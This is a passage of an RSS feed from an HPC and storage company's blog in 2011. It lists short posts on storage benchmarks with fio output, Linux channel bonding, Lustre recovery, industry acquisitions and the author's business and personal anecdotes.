      <description>I&amp;rsquo;ve had some concerns over the business model for this. The price per GB is way &amp;hellip; way out there for SLC. The use case for SLC vs MLC (especially with eMLC coming on line) is very similar. The cost of MLC is making these units affordable, and even worth considering, for people. There seem to be a consumer/hobbyist version and a professional class. The former has a bad performance rap from the first set of products.</description>
    </item>
    
    <item>
      <title>Many happenings in HPC ...</title>
      <link>https://blog.scalability.org/2011/08/many-happenings-in-hpc/</link>
      <pubDate>Mon, 08 Aug 2011 02:20:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/many-happenings-in-hpc/</guid>
      <description>I&amp;rsquo;ve been mostly heads down for the last month, very little time to work on posts. This is a good thing, as this has been mostly (new) business bits. We&amp;rsquo;ve got a range of new products we&amp;rsquo;ve been working on to address specific market segments, and have a number of nice new wins in a market segment we&amp;rsquo;ve been working on for a while. Working on more of course, and our core markets.</description>
    </item>
    
    <item>
      <title>OT:  This juxtaposition on Drudge ... I&#39;m sure it was an accident ...</title>
      <link>https://blog.scalability.org/2011/08/ot-this-juxtaposition-on-drudge-im-sure-it-was-an-accident/</link>
      <pubDate>Fri, 05 Aug 2011 21:35:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/ot-this-juxtaposition-on-drudge-im-sure-it-was-an-accident/</guid>
      <description>It&amp;rsquo;s a Friday, I&amp;rsquo;ve had a tough week (caught pneumonia on the way home from NY, been recovering all this time). Hopefully this isn&amp;rsquo;t the meds talking below &amp;hellip; Every now and then, there is inadvertent and unintentional humor in news. Well, the juxtapositions are humorous, even if the events are terrible. Think &amp;hellip;. causality &amp;hellip; below &amp;hellip;
Obviously, violence isn&amp;rsquo;t a laughing matter. But that juxtaposition &amp;hellip; with Jersey Shore immediately above it &amp;hellip; doesn&amp;rsquo;t quite suggest it was &amp;hellip; or wasn&amp;rsquo;t!</description>
    </item>
    
    <item>
      <title>... and the day job turned 9 ...</title>
      <link>https://blog.scalability.org/2011/08/and-the-day-job-turned-9/</link>
      <pubDate>Wed, 03 Aug 2011 03:13:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/and-the-day-job-turned-9/</guid>
      <description>&amp;hellip; on Monday &amp;hellip; Woo Hoo!!! What hasn&amp;rsquo;t killed us, has made us stronger &amp;hellip; Or something like that. More correctly, the company was born 1-August-2002. Growing since inception. About to grow some more. No venture backing. During this time, we&amp;rsquo;ve worked on trying to convince people that accelerators would be important to HPC, back in 2004 time frame or so. Tried to raise capital, built business plans, got most of the details right.</description>
    </item>
    
    <item>
      <title>Benchies: figuring out how to tune this thing ...</title>
      <link>https://blog.scalability.org/2011/08/benchies-figuring-out-how-to-tune-this-thing/</link>
      <pubDate>Tue, 02 Aug 2011 02:47:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/benchies-figuring-out-how-to-tune-this-thing/</guid>
      <description>Design is good, but it looks like we are rate limited on the PCIe gen 2. 128GB read from a single name space. 8 simultaneous threads.
Run status group 0 (all jobs): READ: io=126984MB, aggrb=5285.8MB/s, minb=5412.6MB/s, maxb=5412.6MB/s, mint=24024msec, maxt=24024msec  Yes, that is 5.3 GB/s. Still far south of what we can be doing, but I&amp;rsquo;ve verified that we are rate limited to ~2GB/s per RAID with other tests. This looks like a card issue.</description>
    </item>
    
    <item>
      <title>Giddy ...</title>
      <link>https://blog.scalability.org/2011/07/giddy/</link>
      <pubDate>Tue, 26 Jul 2011 23:11:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/07/giddy/</guid>
      <description>Benchies soon. Real soon. Should be a screamer &amp;hellip; if we designed/built it right.</description>
    </item>
    
    <item>
      <title>HPC in the cloud and cluster distributions</title>
      <link>https://blog.scalability.org/2011/07/hpc-in-the-cloud-and-cluster-distributions/</link>
      <pubDate>Tue, 26 Jul 2011 05:15:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/07/hpc-in-the-cloud-and-cluster-distributions/</guid>
      <description>Many things are moving to cloud hosting &amp;hellip; I won&amp;rsquo;t comment on being right or wrong about their moving &amp;hellip; and HPC is one of them. This means that cluster distributions are going to follow &amp;hellip; or could follow to some degree. Some cluster distributions focus upon packaging, some focus upon flexibility, some focus upon GUIs. All try to integrate some subset of needed tools. But all were effectively designed for a cluster computing model where some of the key/critical assumptions at the base of the distribution are simply not the case in the cloud, and due to the way they work, can&amp;rsquo;t easily be worked around.</description>
    </item>
    
    <item>
      <title>Many reasons for not posting in the last two weeks</title>
      <link>https://blog.scalability.org/2011/07/many-reasons-for-not-posting-in-the-last-two-weeks/</link>
      <pubDate>Mon, 25 Jul 2011 20:50:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/07/many-reasons-for-not-posting-in-the-last-two-weeks/</guid>
      <description>None of them bad. Too much work to get through (yes, that does mean new/existing orders). A vacation (long overdue, and yes, I was working through it as well). Back now &amp;hellip; will be catching up soon with a set of posts in the next few days.</description>
    </item>
    
    <item>
      <title>Color me amused ...</title>
      <link>https://blog.scalability.org/2011/07/color-me-amused/</link>
      <pubDate>Wed, 13 Jul 2011 21:00:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/07/color-me-amused/</guid>
      <description>Every now and then recruiters call me. Want to see if I want the glamour of some new position somewhere. I run a very nice little, and growing company. I own a substantial fraction of this company. Our revenues are far more than the recruiter&amp;rsquo;s company is likely willing to pay. There are too many digits in our revenues, before the decimal point, relative to any likely salary. I am working extremely hard at increasing the number of digits.</description>
    </item>
    
    <item>
      <title>Storm knocked out power for a while ...</title>
      <link>https://blog.scalability.org/2011/07/storm-knocked-out-power-for-a-while/</link>
      <pubDate>Tue, 12 Jul 2011 23:09:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/07/storm-knocked-out-power-for-a-while/</guid>
      <description>Detroit Edison worked on it and got our office power up in 24 hours. Our house (where this server is located) &amp;hellip; not so happy. Didn&amp;rsquo;t come back on until afternoon today. That was fun. [update] &amp;hellip; and all the updating I&amp;rsquo;ve done has managed to bork the views counter. So it&amp;rsquo;s gonna look like we don&amp;rsquo;t get lots of traffic here. Will see if I can reconstruct this, but it&amp;rsquo;s a low priority item.</description>
    </item>
    
    <item>
      <title>Scanning backing store for a cluster file system</title>
      <link>https://blog.scalability.org/2011/07/scanning-backing-store-for-a-cluster-file-system/</link>
      <pubDate>Sun, 10 Jul 2011 20:03:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/07/scanning-backing-store-for-a-cluster-file-system/</guid>
      <description>Working on solving an issue for a customer. Wrote a backing store scanning tool for the job. It&amp;rsquo;s gathering all manner of information and computing md5 sums. Right now it is single threaded, and as I am watching it run, it seems like I am using about 1/2 of the IO bandwidth (2 scans going at once on a machine). Will look at getting the scans going in parallel. Shouldn&amp;rsquo;t be hard (embarrassingly parallel problem).</description>
    </item>
    
    <item>
      <title>Project relampago: coming to siClusters, JackRabbits, and DeltaV&#39;s near you ...</title>
      <link>https://blog.scalability.org/2011/07/project-relampago-coming-to-siclusters-jackrabbits-and-deltavs-near-you/</link>
      <pubDate>Sun, 10 Jul 2011 05:03:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/07/project-relampago-coming-to-siclusters-jackrabbits-and-deltavs-near-you/</guid>
      <description>We&amp;rsquo;ve been working on some things, quietly, for a while. Almost &amp;hellip; almost ready to talk about this. Should have something to show at SC11 this year certainly. Working on tuning. Maybe a character flaw on my part, but I am never happy with performance. More soon. I promise &amp;hellip; (and yeah, been insanely busy, again).</description>
    </item>
    
    <item>
      <title>Note to self: use the sparse switch when moving data around with tar</title>
      <link>https://blog.scalability.org/2011/07/note-to-self-use-the-sparse-switch-when-moving-data-around-with-tar/</link>
      <pubDate>Wed, 06 Jul 2011 02:38:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/07/note-to-self-use-the-sparse-switch-when-moving-data-around-with-tar/</guid>
      <description>Using a tar pair to move data between two systems, over an NFS link. This is faster than over ssh (ssh isn&amp;rsquo;t a fast transport layer). Some user wrote a sparse file out. An 11PB sparse file. Which the tar happily &amp;hellip; happily I tell you !!! was trying to copy, in its entirety, over to the backup unit. Happily. Took me a quick look to see what was going on.</description>
    </item>
    
    <item>
      <title>Transformers ... shot in Michigan</title>
      <link>https://blog.scalability.org/2011/06/transformers-shot-in-michigan/</link>
      <pubDate>Tue, 28 Jun 2011 16:15:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/transformers-shot-in-michigan/</guid>
      <description>This was nice. The original movie in the series was shot in downtown Detroit. Or at least the scenes towards the end (when they are duking it out in the city). It was funny to see the old railroad terminal building being used as a chase scene. FWIW, that building would make one helluva nice data center. Just needs to be cleaned up, with lots of AC/power added. Right next to a railroad right of way.</description>
    </item>
    
    <item>
      <title>You win some, and you lose some</title>
      <link>https://blog.scalability.org/2011/06/you-win-some-and-you-lose-some/</link>
      <pubDate>Mon, 27 Jun 2011 19:08:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/you-win-some-and-you-lose-some/</guid>
      <description>Just found out the day job lost a major storage upgrade to a competitor. Read over the evaluations, and we had some questions, sent them off to the purchasing folks. It&amp;rsquo;s always annoying to lose. But from losing you can gain knowledge of why you lost and hone your offerings or your bidding &amp;hellip; well &amp;hellip; most of the time you can. Sometimes, the process is engineered for a particular outcome, due to an effective manipulation of rankings.</description>
    </item>
    
    <item>
      <title>Updated DeltaV benchmarks, and a limited time discount offer</title>
      <link>https://blog.scalability.org/2011/06/updated-deltav-benchmarks/</link>
      <pubDate>Tue, 21 Jun 2011 15:35:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/updated-deltav-benchmarks/</guid>
      <description>Somewhat better tuning on this unit now. This is getting &amp;hellip; interesting. Very interesting. As a reminder, the day job&amp;rsquo;s lower cost storage target, the DeltaV is designed specifically to be a lower end machine. It is fast, and as we saw on the last set of numbers, it is actually faster than competitors&amp;rsquo; hardware RAID. DeltaV does the RAID bits in software. So this is another (identical) unit to the one we tested before.</description>
    </item>
    
    <item>
      <title>There is a clear and present need for meaningful metrics for HPC and storage</title>
      <link>https://blog.scalability.org/2011/06/there-is-a-clear-and-present-need-for-meaningful-metrics-for-hpc-and-storage/</link>
      <pubDate>Tue, 21 Jun 2011 14:52:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/there-is-a-clear-and-present-need-for-meaningful-metrics-for-hpc-and-storage/</guid>
      <description>As the discussion of the amazing performance of the K machine continues, one needs to ask how well correlated the numbers are against end user realizable and likely performance. That is, how useful is top500 as an actual predictor of system performance for a particular task? Same question of Graph500, SPEC*, etc. ? How useful is Green500 at predicting power utilization and likely throughput of a specific design? Basically, I am not trying to minimize the efforts put into these.</description>
    </item>
    
    <item>
      <title>OT: Fun week ahead</title>
      <link>https://blog.scalability.org/2011/06/ot-fun-week-ahead/</link>
      <pubDate>Mon, 20 Jun 2011 18:40:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/ot-fun-week-ahead/</guid>
      <description>This is a personal bit. I am going up for belt promotion in Karate this Thursday. Huge risk saying something in advance in case I don&amp;rsquo;t make it. I am not worried about most of it. The fighting portion, yeah, a bit. I&amp;rsquo;m fine in sparring bouts, but this promises to be at least 7 fresh opponents, one after the other, with no rest for me. 2 minutes each opponent, and they run them from low to higher rank (the opponents get tougher at the end).</description>
    </item>
    
    <item>
      <title>&#34;K&#34; is atop the top500.  What does this mean to us?</title>
      <link>https://blog.scalability.org/2011/06/k-is-atop-the-top500-what-does-this-mean-to-us/</link>
      <pubDate>Mon, 20 Jun 2011 18:02:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/k-is-atop-the-top500-what-does-this-mean-to-us/</guid>
      <description>Not much. No, I am not trying to be a downer. The relation of the top500 top-o-the-heap to mere mortals with hard problems to solve isn&amp;rsquo;t very strong. Actually it&amp;rsquo;s quite weak. There is only one K machine. It&amp;rsquo;s at RIKEN in Japan. There&amp;rsquo;s only one Jaguar, and only one Tianhe machine. All are, to some degree or the other, unique in some aspects. What matters to most people is &amp;ldquo;what can it do for me&amp;rdquo;?</description>
    </item>
    
    <item>
      <title>Updated DeltaV in the lab</title>
      <link>https://blog.scalability.org/2011/06/updated-deltav-in-the-lab/</link>
      <pubDate>Wed, 15 Jun 2011 20:17:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/updated-deltav-in-the-lab/</guid>
      <description>Should be a pretty good performance bump for the unit. Processor and memory bump. Newer backplane. Some other bits. Will update soon. Really looking forward to the benchies :) [Update 1] Very encouraging sign: RAID build is occurring at about 2x the rate of the previous generation. Should be done with 48TB RAID build in about 7 more hours. The comparison to the hardware accelerated RAID should be made as well.</description>
    </item>
    
    <item>
      <title>One of the best compilers out there goes open source</title>
      <link>https://blog.scalability.org/2011/06/one-of-the-best-compilers-out-there-goes-open-source/</link>
      <pubDate>Mon, 13 Jun 2011 17:04:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/one-of-the-best-compilers-out-there-goes-open-source/</guid>
      <description>Pathscale makes some of the best C/C++/Fortran compilers on the market. And now, they are open source. Grab the bits while they are hot!</description>
    </item>
    
    <item>
      <title>Shakes head ...</title>
      <link>https://blog.scalability.org/2011/06/shakes-head/</link>
      <pubDate>Fri, 10 Jun 2011 17:26:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/shakes-head/</guid>
      <description>Them: Here is our parts list. We found it by going to these web sites (see long list) finding the lowest cost among them, and then adding it in to the spec. Me: Uh huh (noting the several conflicting and wrong elements). So what is it you are trying to do &amp;hellip; Them: Never mind that, this is our new machine, and it will do X &amp;hellip; [n.b. X is some magical realization of performance at the 99th percentile of the systems capability &amp;hellip; only would hit that if everything, and I mean EVERYTHING, was perfect.</description>
    </item>
    
    <item>
      <title>Fusion IO IPO tomorrow ... is the market for PCIe Flash strong enough to support 1 or more companies?</title>
      <link>https://blog.scalability.org/2011/06/fusion-io-ipo-tomorrow-is-the-market-for-pcie-flash-strong-enough-to-support-1-or-more-companies/</link>
      <pubDate>Wed, 08 Jun 2011 16:58:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/fusion-io-ipo-tomorrow-is-the-market-for-pcie-flash-strong-enough-to-support-1-or-more-companies/</guid>
      <description>FusionIO goes public tomorrow. If you are an early employee, chances are, you are going to be a millionaire by the end of the day, at least on paper. The author of the great &amp;ldquo;fio&amp;rdquo; tool works there, and I hope this does work out for him and the rest of them well. But &amp;hellip; my question is a longer term one. Does the market &amp;hellip; or will the market &amp;hellip; support a higher cost PCIe channel flash as opposed to lower cost SSD based units?</description>
    </item>
    
    <item>
      <title>How to channel bond in Linux</title>
      <link>https://blog.scalability.org/2011/06/how-to-channel-bond-in-linux/</link>
      <pubDate>Tue, 07 Jun 2011 21:36:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/how-to-channel-bond-in-linux/</guid>
      <description>Partner wants a 4 way bond on their unit. No problem.
[root@jr4-1 ~]# /opt/scalable/sbin/mkchbond.pl --bond=bond0 --eth=eth0,eth1,eth2,eth3 --ip=10.100.243.80 --netmask=255.255.0.0 --mode=0 --write mkchbond.pl: v0.9 Create channel bonds easily by Joe Landman (http://scalableinformatics.com) This software is Copyright (c) 2005-2007 by Scalable Informatics and licensed under GPL v2.0 only. You may freely distribute this software under the terms and conditions of the GPL 2.0 license. You may not alter, remove, or prevent printing of the copyright notice and information.</description>
    </item>
    
    <item>
      <title>Disappointed, but, I guess, not surprised</title>
      <link>https://blog.scalability.org/2011/06/disappointed-but-i-guess-not-surprised/</link>
      <pubDate>Mon, 06 Jun 2011 20:16:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/disappointed-but-i-guess-not-surprised/</guid>
      <description>Several years ago, we had an academic customer literally steal our time, our effort, our design, etc. for their system. The signals were there, and we didn&amp;rsquo;t pay attention to them. Something like that happened again, though this time we recognized it. Customer still is operating off the assumption that they got something for nothing, but &amp;hellip; well &amp;hellip; when they put their system together, discover that it doesn&amp;rsquo;t work, I expect a few probing emails.</description>
    </item>
    
    <item>
      <title>Why do companies erect unneeded barriers?</title>
      <link>https://blog.scalability.org/2011/06/why-do-companies-erect-unneeded-barriers/</link>
      <pubDate>Fri, 03 Jun 2011 21:25:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/why-do-companies-erect-unneeded-barriers/</guid>
      <description>This is about the business side, and AMEX in particular. A customer bought something. Paid for it on AMEX. We use Authorize.Net, as do many people. It handles the card processing for us. Makes our life easy. But it doesn&amp;rsquo;t do AMEX directly, AMEX does AMEX. And they don&amp;rsquo;t play well with Authorize.Net. So now we are in the position of having to decline this AMEX transaction, and remove AMEX from our accepted card list, because AMEX is more interested in wasting my time and erecting barriers to doing business, than actually doing business.</description>
    </item>
    
    <item>
      <title>What are xfs&#39;s real limits?</title>
      <link>https://blog.scalability.org/2011/06/what-are-xfss-real-limits/</link>
      <pubDate>Fri, 03 Jun 2011 05:40:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/what-are-xfss-real-limits/</guid>
      <description>Over at Enterprise Storage Forum, Henry Newman and Jeff Layton started a conversation that needs to be shared. This is a very good article. In it, they reproduced a table comparing file systems coming from this page at Red Hat. This is really showing a comparison of what the &amp;ldquo;limits&amp;rdquo; are in a theoretical or practical sense between the various versions of RHEL platforms. The file system table compares what you can do in each version.</description>
    </item>
    
    <item>
      <title>Working on a few new things ...</title>
      <link>https://blog.scalability.org/2011/05/working-on-a-few-new-things/</link>
      <pubDate>Fri, 27 May 2011 05:19:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/05/working-on-a-few-new-things/</guid>
      <description>ok, some of these are riffs on our older things, but they are very exciting to everyone we speak with. Need a chassis mod for one of them. The other is &amp;hellip; well &amp;hellip; an extension of an earlier idea. Been doing some testing with it, and it&amp;rsquo;s working out far better than I had thought. Sorry for being so vague. I don&amp;rsquo;t want to let these cats out of the bag &amp;hellip; yet.</description>
    </item>
    
    <item>
      <title>OT:  been very busy ...</title>
      <link>https://blog.scalability.org/2011/05/ot-been-very-busy/</link>
      <pubDate>Wed, 25 May 2011 18:03:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/05/ot-been-very-busy/</guid>
      <description>Good version of busy; lots of quotes, orders, builds, &amp;hellip;. A new market has emerged for us, one I wasn&amp;rsquo;t sure how to break into, that looks like it is going to do good things for us. Entrenched expensive and slow competitor, everyone looking for better systems. Should be an interesting coupla months. I hope I get time for a vacation in there somewhere.</description>
    </item>
    
    <item>
      <title>OT:  Just played with Google Docs ...</title>
      <link>https://blog.scalability.org/2011/05/ot-just-played-with-google-docs/</link>
      <pubDate>Mon, 23 May 2011 05:41:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/05/ot-just-played-with-google-docs/</guid>
      <description>Wow &amp;hellip; uploaded a presentation I was working on for a customer and it worked well. Rendered everything correctly (OpenOffice doesn&amp;rsquo;t always do that). Anyone else using Google Docs on a more or less professional/constant basis? Any outage issues? Compatibility issues? I like OpenOffice, but its occasional glitches and &amp;hellip; er &amp;hellip; interpretive re-renderings of Powerpoints are &amp;hellip; er &amp;hellip; amusing. The downsides to Google Docs are offsite storage, privacy/security issues, and access in the event of a network outage.</description>
    </item>
    
    <item>
      <title>OT:  heh ... nice to see people resuming a healthy skepticism</title>
      <link>https://blog.scalability.org/2011/05/ot-heh-nice-to-see-people-resuming-a-healthy-skepticism/</link>
      <pubDate>Tue, 17 May 2011 21:21:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/05/ot-heh-nice-to-see-people-resuming-a-healthy-skepticism/</guid>
      <description>See here . money quote
My gosh &amp;hellip; a follow the money mystery? Who woulda thunk it? At any rate, its good to see people resume the healthy skepticism that is needed for real scientific inquiry and advancement. Science is never settled, and anyone telling you otherwise is trying to sell you something. Sure enough, some of those doing the selling have a strong economic incentive for doing so. Go figure.</description>
    </item>
    
    <item>
      <title>... and Sandisk swallows Pliant ...</title>
      <link>https://blog.scalability.org/2011/05/and-sandisk-swallows-pliant/</link>
      <pubDate>Tue, 17 May 2011 05:40:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/05/and-sandisk-swallows-pliant/</guid>
      <description>This is interesting. SanDisk now has an enterprise play. Flash is getting more interesting. Basically creating the same sort of sea change in storage that GPUs created in computing.</description>
    </item>
    
    <item>
      <title>Still struggling with half-open and otherwise broken drivers</title>
      <link>https://blog.scalability.org/2011/05/still-struggling-with-half-open-and-otherwise-broken-drivers/</link>
      <pubDate>Mon, 16 May 2011 20:54:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/05/still-struggling-with-half-open-and-otherwise-broken-drivers/</guid>
      <description>We have a nice pair of Qlogic 7220 DDR HCAs in house. Direct connecting a pair of machines for a simple point to point bit. Using our updated 2.6.32.39.scalable kernel. Want to set up SRP target. So we have to get OFED compiled. Need 1.5.3+ due to their &amp;hellip; er &amp;hellip; issues tracking kernels. Basically the OFED build process is an abuse &amp;hellip; a very severe one &amp;hellip; of the RPM process.</description>
    </item>
    
    <item>
      <title>Updated JackRabbit JR5 results</title>
      <link>https://blog.scalability.org/2011/05/updated-jackrabbit-jr5-results/</link>
      <pubDate>Mon, 09 May 2011 02:10:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/05/updated-jackrabbit-jr5-results/</guid>
      <description>Lab machine, updated RAID system (to our current shipping specs). We&amp;rsquo;ve got a 10GbE and an IB DDR card in there for some end user lab tests over the next 2 weeks. We just finished rebuilding the RAID unit, and I wanted a baseline measurement. So a fast write then read (uncached of course).
[root@jr5-lab fio]# fio sw.fio ... Run status group 0 (all jobs): WRITE: io=195864MB, aggrb=3789.1MB/s, minb=3880.1MB/s, maxb=3880.1MB/s, mint=51680msec, maxt=51680msec  That&amp;rsquo;s the write.</description>
    </item>
    
    <item>
      <title>IT storage</title>
      <link>https://blog.scalability.org/2011/05/it-storage/</link>
      <pubDate>Fri, 06 May 2011 04:27:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/05/it-storage/</guid>
      <description>They see a shiny new storage chassis with 6G backplane. They fill it with &amp;ldquo;fast&amp;rdquo; drives, and build &amp;ldquo;raids&amp;rdquo; using integrated RAID platforms. They insist it should be fast, showing calculations that suggest that it should sustain near theoretical max performance on IO. Yet, the reality is that it&amp;rsquo;s 1/10th to 1/20th the theoretical max performance. What&amp;rsquo;s going on? In the past, I&amp;rsquo;ve railed against &amp;ldquo;IT clusters&amp;rdquo; &amp;hellip; basically clusters designed, built, and operated by IT staff unfamiliar with how HPC systems worked.</description>
    </item>
    
    <item>
      <title>Unbelievable</title>
      <link>https://blog.scalability.org/2011/05/unbelievable/</link>
      <pubDate>Fri, 06 May 2011 04:08:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/05/unbelievable/</guid>
      <description>A system designed to fail often will. Seen this a few times this past week. In one case, someone agrees that what we do and our machines have value, but they want our stuff without paying us for our stuff. They don&amp;rsquo;t want to buy them. They just want us to tell them how to build them. They don&amp;rsquo;t want to buy our stuff, even though we&amp;rsquo;ve demonstrated that our systems solve their problem.</description>
    </item>
    
    <item>
      <title>Interesting acquisition:  STEC takes KQ Infotech (assets)</title>
      <link>https://blog.scalability.org/2011/04/interesting-acquisition-stec-takes-kq-infotech-assets/</link>
      <pubDate>Wed, 27 Apr 2011 02:20:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/interesting-acquisition-stec-takes-kq-infotech-assets/</guid>
      <description>I wasn&amp;rsquo;t expecting this one. KQ Infotech is a smaller development house, probably best known for porting ZFS to Linux and providing the tools required for end users to build their own ZFS on their own machines (thus getting around some of the major hurdles with the GPL and CDDL licenses). To be honest, though, we&amp;rsquo;ve seen some pretty interesting M&amp;amp;A bits over the last 2-4 weeks.</description>
    </item>
    
    <item>
      <title>Ok, this is just showing off now ...</title>
      <link>https://blog.scalability.org/2011/04/ok-this-is-just-showing-off-now/</link>
      <pubDate>Thu, 21 Apr 2011 20:56:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/ok-this-is-just-showing-off-now/</guid>
      <description>One of the two units we are going to ship to a customer very soon. Running the 19.2TB write. Fill up 1/2 the system. With a single file. Of 19.2TB size. In less than 2 hours. Don&amp;rsquo;t try this on ext*.
[root@jr5-1 ~]# fio sw-19.2TB.fio ... Run status group 0 (all jobs): WRITE: io=19200GB, aggrb=3160.7MB/s, minb=3235.1MB/s, maxb=3235.1MB/s, mint=6221566msec, maxt=6221566msec [root@jr5-1 ~]# df -h Filesystem Size Used Avail Use% Mounted on /dev/md0 44G 5.</description>
    </item>
    
    <item>
      <title>Raw, unapologetic, firepower</title>
      <link>https://blog.scalability.org/2011/04/raw-unapologetic-firepower/</link>
      <pubDate>Tue, 19 Apr 2011 13:34:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/raw-unapologetic-firepower/</guid>
      <description>96TB Scalable Informatics JackRabbit JR5 unit, shipping out to a customer today (or early tomorrow). These are single thread, single process, single file writes. Taking it out to the track and cracking the throttle, wide open.
[root@jr5-2 ~]# fio sw.fio ... Run status group 0 (all jobs): WRITE: io=65028MB, aggrb=3801.1MB/s, minb=3893.2MB/s, maxb=3893.2MB/s, mint=17104msec, maxt=17104msec [root@jr5-2 ~]# fio sr.fio ... Run status group 0 (all jobs): READ: io=65028MB, aggrb=3257.2MB/s, minb=3335.3MB/s, maxb=3335.3MB/s, mint=19965msec, maxt=19965msec  and the 1TB run</description>
    </item>
    
    <item>
      <title>... and Seagate snarfs up Samsung&#39;s drive business ...</title>
      <link>https://blog.scalability.org/2011/04/and-seagate-snarfs-up-samsungs-drive-business/</link>
      <pubDate>Tue, 19 Apr 2011 11:46:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/and-seagate-snarfs-up-samsungs-drive-business/</guid>
      <description>Looks like Seagate got itself some spinpoints. Seagate may be leveraging this to build its way into the Chinese market more than it is. Now there are 3 big spinning rust makers: Seagate, Western Digital, and Toshiba. A Seagate-Toshiba hookup wouldn&amp;rsquo;t surprise me, though the regulators are likely to start eyeing this stuff more closely for anti-monopoly reasons. I&amp;rsquo;ve said more M&amp;amp;A, and I meant more M&amp;amp;A. And the deals ain&amp;rsquo;t done yet.</description>
    </item>
    
    <item>
      <title>Ignore the spork behind the curtain ...</title>
      <link>https://blog.scalability.org/2011/04/ignore-the-spork-behind-the-curtain/</link>
      <pubDate>Mon, 18 Apr 2011 18:05:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/ignore-the-spork-behind-the-curtain/</guid>
      <description>At InsideHPC, Rich notes in a post
Heh &amp;hellip; I&amp;rsquo;d argue that the (sp)fork already happened, it&amp;rsquo;s in the past, and people have decided to continue moving forward with the new (sp)fork. This said, this is decidedly not a bad thing. As I had predicted, Oracle has largely abandoned all things HPC that it couldn&amp;rsquo;t re-mission for some other decidedly non-HPC purpose. The only realistic reason for retaining ownership of the Lustre IP/copyrights/etc.</description>
    </item>
    
    <item>
      <title>file system surgery on borked Lustre volumes</title>
      <link>https://blog.scalability.org/2011/04/file-system-surgery/</link>
      <pubDate>Sat, 16 Apr 2011 15:36:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/file-system-surgery/</guid>
      <description>So whatcha gonna do when you have a Lustre file system, with an ext4 backing store with a journal on an external RAID1 SSD, when that external RAID1 ssd pair goes away (in a non-recoverable manner), and the file system has the needs_recovery flag set? You see, the &amp;lsquo;-f&amp;rsquo; option to e2fsck &amp;hellip; doesn&amp;rsquo;t &amp;hellip; in the face of a missing external journal with needs_recovery set. Ok, you can turn off the journal.</description>
    </item>
    
    <item>
      <title>On the broken-ness of most Linux distributions ...</title>
      <link>https://blog.scalability.org/2011/04/on-the-broken-ness-of-most-linux-distributions/</link>
      <pubDate>Sat, 16 Apr 2011 06:02:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/on-the-broken-ness-of-most-linux-distributions/</guid>
      <description>If you have anything approaching a complex installation or management requirement for your systems, most &amp;hellip; no &amp;hellip; pretty much all Linux distributions have anywhere from somewhat borked to completely boneheaded designs for handling these complex situations. Say, for example, you want to boot a diskless NFS system, and replicate it. Diskless NFS is well known to be an easy to manage scenario &amp;hellip; one system to manage, very scalable from an admin point of view.</description>
    </item>
    
    <item>
      <title>At NAB in Las Vegas ...  in a word ... wow!!!</title>
      <link>https://blog.scalability.org/2011/04/at-nab-in-las-vegas-in-a-word-wow/</link>
      <pubDate>Wed, 13 Apr 2011 04:39:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/at-nab-in-las-vegas-in-a-word-wow/</guid>
      <description>I&amp;rsquo;ve got a much longer writeup in mind. Those who attend SCxx and think it&amp;rsquo;s big &amp;hellip; er &amp;hellip; no. A conservative guess is that NAB is 5x the size of SCxx in terms of exhibit floor space. This may be an underestimate by 2-4x. BTW, I&amp;rsquo;ve only visited the upper and lower south exhibit hall areas. Not the central or north exhibit halls. And, to add insult to injury &amp;hellip; the entire SCxx floor would fit in 1/2 of one of the upper or lower floor levels.</description>
    </item>
    
    <item>
      <title>Another test case on a 5U JackRabbit</title>
      <link>https://blog.scalability.org/2011/04/another-test-case-on-a-5u-jackrabbit/</link>
      <pubDate>Mon, 11 Apr 2011 18:20:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/another-test-case-on-a-5u-jackrabbit/</guid>
      <description>This is the other 5U JackRabbit unit we are building for the customer. Single thread read of a large file, no caching. This is spinning rust (e.g. hard disk). This uses 2TB drives while the other unit uses 1TB drives. The theoretical maximum we could pull data off these units the way they are arranged now is 4.68 GB/s with these particular drives.
